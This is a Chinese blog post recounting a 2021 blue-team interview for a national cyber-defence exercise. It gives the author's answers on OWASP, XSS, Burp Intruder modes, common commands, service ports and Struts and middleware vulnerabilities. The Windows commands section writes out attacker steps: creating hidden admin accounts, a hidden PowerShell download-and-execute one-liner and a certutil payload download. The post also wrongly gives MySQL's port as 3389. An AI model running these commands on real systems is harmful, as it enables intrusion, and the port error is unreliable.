2021记一次hw蓝队招聘一面

2021记一次hw蓝队招聘一面

        • 首先问一下以后就业想去哪个城市,什么岗位。
          • 1.什么是hw行动,蓝队主要工作是什么
          • 2.什么是owasp,owasp top10漏洞有什么
          • 3.xss都有什么,能简单说一下dom型 xss吗?
          • 4.burp说一下都有什么模块,还有爆破的4个模式都是什么
          • 5.windows的基础命令和linux的基础命令
          • 6.都有什么内网环境,系统什么的
          • 7.docker是什么?常用命令都有什么?怎么用docker搭建环境?
          • 8.漏洞复现过没?讲一下流程,vulhub怎么弄?
          • 9. 永恒之蓝讲一下,怎么利用
          • 10.java反序列化漏洞知道吗?什么是序列化和反序列化
          • 11.三大java框架是什么?漏洞什么的
          • 12.常见端口都有什么?重点数据库端口
          • 13.mysql和oracle了解吗?什么是关系型和非关系型
          • 14.讲一下渗透流程吧
          • 15.python讲一下写过那些工具,然后用到那些模块都是做什么的
          • 16.java都知道吗?写过什么工具
          • 17.中间件的都有那些,常见漏洞有什么
          • 18.

首先问一下以后就业想去哪个城市,什么岗位。

1.什么是hw行动,蓝队主要工作是什么

护网行动是国家应对网络安全问题所做的重要布局之一。随着大数据、物联网、云计算的快速发展,愈演愈烈的网络攻击已经成为国家安全的新挑战。国家关键信息基础设施可能时刻受到来自网络攻击的威胁。网络安全的态势之严峻,迫切需要我们在网络安全领域具备能打硬仗的能力,“护网行动”应运而生。
简单来说就是,以国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。并以此为契机和抓手,推动网络安全各项工作再上新台阶
蓝队就是日志分析,手段反制,信息研判等等,别让你所在企业丢分就行了,异常ip流量及时上报,封,封,封,不扯了,具体百度一下

2.什么是owasp,owasp top10漏洞有什么

(1)SQL 注入防护方法:
(2)失效的身份认证和会话管理
(3)跨站脚本攻击 XSS
(4)直接引用不安全的对象
(5)安全配置错误
(6)敏感信息泄露
(7)缺少功能级的访问控制
(8)跨站请求伪造 CSRF
(9)使用含有已知漏洞的组件
(1))未验证的重定向和转发

3.xss都有什么,能简单说一下dom型 xss吗?

1.反射型
2.存储型
3.Dom-based型
客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。例如客户端如从 URL 中提取数据并在本地执行,如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本,而这些脚本没有经过适当的过滤和消毒,那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等。
2021记一次hw蓝队招聘一面_第1张图片

4.burp说一下都有什么模块,还有爆破的4个模式都是什么
  1. Dashboard(仪表盘)
  2. Target(目标)
  3. Proxy(代理)
  4. Intruder(侵入)也就是爆破
  5. Repeater(重放)
  6. Sequencer(序列器)
  7. Decoder(解码器)
  8. Comparer(比较)
  9. Extender(扩展)
  10. Project options(项目选项)
  11. Options(用户选项)
爆破四个模式:
Sniper:狙击手      		如果2个变量,先固定 第二个值爆破A,然后 在固定 第一个值爆破2
例如  原数值number1=10  ,number2=20    变量设置数字1-3 (payload只能1个)
number1=1		number2=20
number1=2		number2=20
number1=3		number2=20
number1=10		number2=1
number1=10		number2=2
number1=10		number2=3

Battering ram:攻城锤   	 2个或者多个变量同时用一个payload同时改变(一个变量同时使用)
例如  原数值number1=10  ,number2=20    变量设置数字1-3 (payload只能1个)
number1=1		number2=1
number1=2	 	number2=2
number1=3		number2=3

Pitchfork:叉子        		多个变量各自用自己的payload值爆破(payload相互独立)
例如  原数值number1=10  ,number2=20    变量设置数字1-3 (变量几个 payload几个) 变量1为 1-3    变量2 为 6-8
number1=1		number2=6
number1=2	 	number2=7
number1=3		number2=8

Cluster bomb:集束炸弹     	利用payload1的值轮流与pyload2的值爆破(最全面的)
例如  原数值number1=10  ,number2=20    变量设置数字1-3 (变量几个 payload几个) 变量1为 1-3    变量2 为 6-8
number1=1		number2=6
number1=2		number2=6
number1=3		number2=6
number1=1		number2=7
number1=2	 	number2=7
number1=3		number2=7
number1=1		number2=8
number1=2	 	number2=8
number1=3		number2=8
5.windows的基础命令和linux的基础命令
Windows:
type   显示文本内容         type  1.txt
dir    显示当前目录内容
dir/s/b    查询文件 返回绝对路径,例如   dir/s/b  d:\a.php  查询D盘中a.php文件返回绝对路径     
								     dir c:\ /s /b *.txt  查询c盘中txt文件,并返回绝对路径
/b 显示文件夹或文件的名字
/s 显示指定目录和所有子目录中的文件
* 是通配符,可以代表任意字符串

del 删除文件
ipconfig 查看IP地址
ipconfig /all    查看所有ip配置信息
net user         查看用户
net user ad   查看用户权限   ad为用户名
net user  username  password /add     username 和password为你要添加的账号和密码
net user  username$  password  /add     隐藏用户
net user   username    /del   删除  或者username$  删除隐藏
net localgroup administrators username /add         username为要添加管理员组别的用户
net localgroup administrators     查看所有用户包括隐藏
query user || qwinsta    查看管理员是否在线
tasklist /svc | find "Ter",假如 TermService 的 PID 是 1592。查找远程桌面端口
netstat -ano | find "1592",查看 TermService 使用的端口,如示例中的 3389
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.1/powershell.txt'))"
powershell 隐藏执行下载脚本
certutil.exe -urlcache -split -f “文件下载地址” d:\test.exe            将文件下载到d盘命名为test.exe
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件
Linux:
service  iptables status   查看防火墙状态
service  iptables start		开启防火墙
service  iptables stop		关闭防火墙
service  iptables restart 	重启防火墙

6.都有什么内网环境,系统什么的
7.docker是什么?常用命令都有什么?怎么用docker搭建环境?
8.漏洞复现过没?讲一下流程,vulhub怎么弄?

Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
这个环境应该都了解,虽然不经常复现,还是知道的,一键创建环境,复现方便得很
官网,https://vulhub.org/ --------要学习 自己去看看吧

9. 永恒之蓝讲一下,怎么利用

Ms17-010这个经典漏洞,不用说太多,直接说过程,msf说一下过程就可以了,这个简单,还问了一下rhost和lhost什么意思,这个也简单,永恒之蓝具体的可以百度,这个太多了

10.java反序列化漏洞知道吗?什么是序列化和反序列化
11.三大java框架是什么?漏洞什么的

三大框架:Struts+Hibernate+Spring
java三大框架主要用来做WEN应用。
Struts主要负责表示层的显示 Struts2是apache项目下的一个web 框架
Spring利用它的IOC和AOP来处理控制业务(负责对数据库的操作)
Hibernate主要是数据持久化到数据库

  • Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts
    2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts
    2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大
    S2-016 远程代码执行漏洞
    S2-045 远程代码执行漏洞(CVE-2017-5638)
    S2-046 远程代码执行漏洞
    S2-048 远程代码执行漏洞
    S2-052 远程代码执行漏洞(CVE-2017-9805)
    S2-053 远程代码执行漏洞
    S2-057远程代码执行漏洞(CVE-2018-11776)
    等等漏洞。就写部分
12.常见端口都有什么?重点数据库端口
21 ftp        ftp的端口号20、21的区别一个是数据端口,一个是控制端口,控制端口一般为21
69 TFTP       (简单文件传输协议) 
22 SSH 
23 Telnet
80 web
80-89 web
443 https   SSL心脏滴血
445 SMB     ms17-010永恒之蓝
873 Rsync未授权
1433 MSSQL
1521 Oracle    这玩应记不住?记不住?
3306 MySQL
3389 远程桌面
5432 PostgreSQL
5900 vnc   目前常用的协议有VNC/SPICE/RDP三种 、小巧,支持客户端和服务器端的直接拷贝粘贴,缺点:速度最慢
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
8080 tomcat/WDCP主机管理系统,默认弱口令
8080,8089,9090 JBOSS
Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,
		默认端口是8080
		在windows系统中:
 	1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中
 	8080端口在/jboss/server/default/deploy/jboss-web.deployer/server.xml中
 	8093端口在/jboss/server/default/deploy/jms/uil2-service.xml中。
8000-9090 都是一些常见的web端口
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50070,50030 hadoop默认端口未授权访问

161 SNMP
389 LDAP
512,513,514 Rexec
1025,111 NFS
2082/2083 cpanel主机管理系统登陆 (国外用较多)
2222 DA虚拟主机管理系统登陆 (国外用较多)
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
3312/3311 kangle主机管理系统登陆
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
7778 Kloxo主机控制面板登录
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
50000 SAP命令执行
部分参考csdn一位师傅的,自己整理一些
13.mysql和oracle了解吗?什么是关系型和非关系型

mysql 端口3389
Oracle 端口1521

  • 关系型数据库是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。简单说,关系型数据库是由多张能互相连接的表组成的数据库。
    一. 优点
    1)都是使用表结构,格式一致,易于维护。
    2)使用通用的 SQL 语言操作,使用方便,可用于复杂查询。
    3)数据存储在磁盘中,安全。
    二. 缺点
    1. 读写性能比较差,不能满足海量数据的高效率读写。
    2. 不节省空间。因为建立在关系模型上,就要遵循某些规则,比如数据中某字段值即使为空仍要分配空间。
    3. 固定的表结构,灵活度较低。
常见的关系型数据库有 Oracle、DB2、PostgreSQL、Microsoft SQL Server、Microsoft   
Access 和 MySQL 等。
  • 非关系型数据库又被称为 NoSQL(Not Only SQL ),意为不仅仅是
    SQL。通常指数据以对象的形式存储在数据库中,而对象之间的关系通过每个对象自身的属性来决定。
    一. 优点
    1. 非关系型数据库存储数据的格式可以是 key-value
      形式、文档形式、图片形式等。使用灵活,应用场景广泛,而关系型数据库则只支持基础类型。
    2. 速度快,效率高。NoSQL 可以使用硬盘或者随机存储器作为载体,而关系型数据库只能使用硬盘。
    3. 海量数据的维护和处理非常轻松。
    4. 非关系型数据库具有扩展简单、高并发、高稳定性、成本低廉的优势。
      可以实现数据的分布式处理。
      二. 缺点
      非关系型数据库暂时不提供 SQL 支持,学习和使用成本较高。
      非关系数据库没有事务处理,没有保证数据的完整性和安全性。适合处理海量数据,但是不一定安全。
      功能没有关系型数据库完善。
常见的非关系型数据库有 Neo4j、MongoDB、Redis、Memcached、MemcacheDB 和 HBase 等。

摘抄于公众号: MySQL和Python学习

14.讲一下渗透流程吧
15.python讲一下写过那些工具,然后用到那些模块都是做什么的
16.java都知道吗?写过什么工具
17.中间件的都有那些,常见漏洞有什么

.

  • IIS

  • iis6解析漏洞,iis7解析漏洞,put任意文件上传,iis短文件名等

  • .asp;.jpg 当成Asp解析 *.asp/目录下的所有文件当成Asp解析

  • Apache 未知扩展名解析漏洞(默认从后向前解析,一直解析到认识的拓展名) Apache HTTPD
    换行解析漏洞CVE-2017-15715

Nginx

Tomcat
Jboss
Weblogic
GlassFish
WebSphere

18.

你可能感兴趣的:(面试)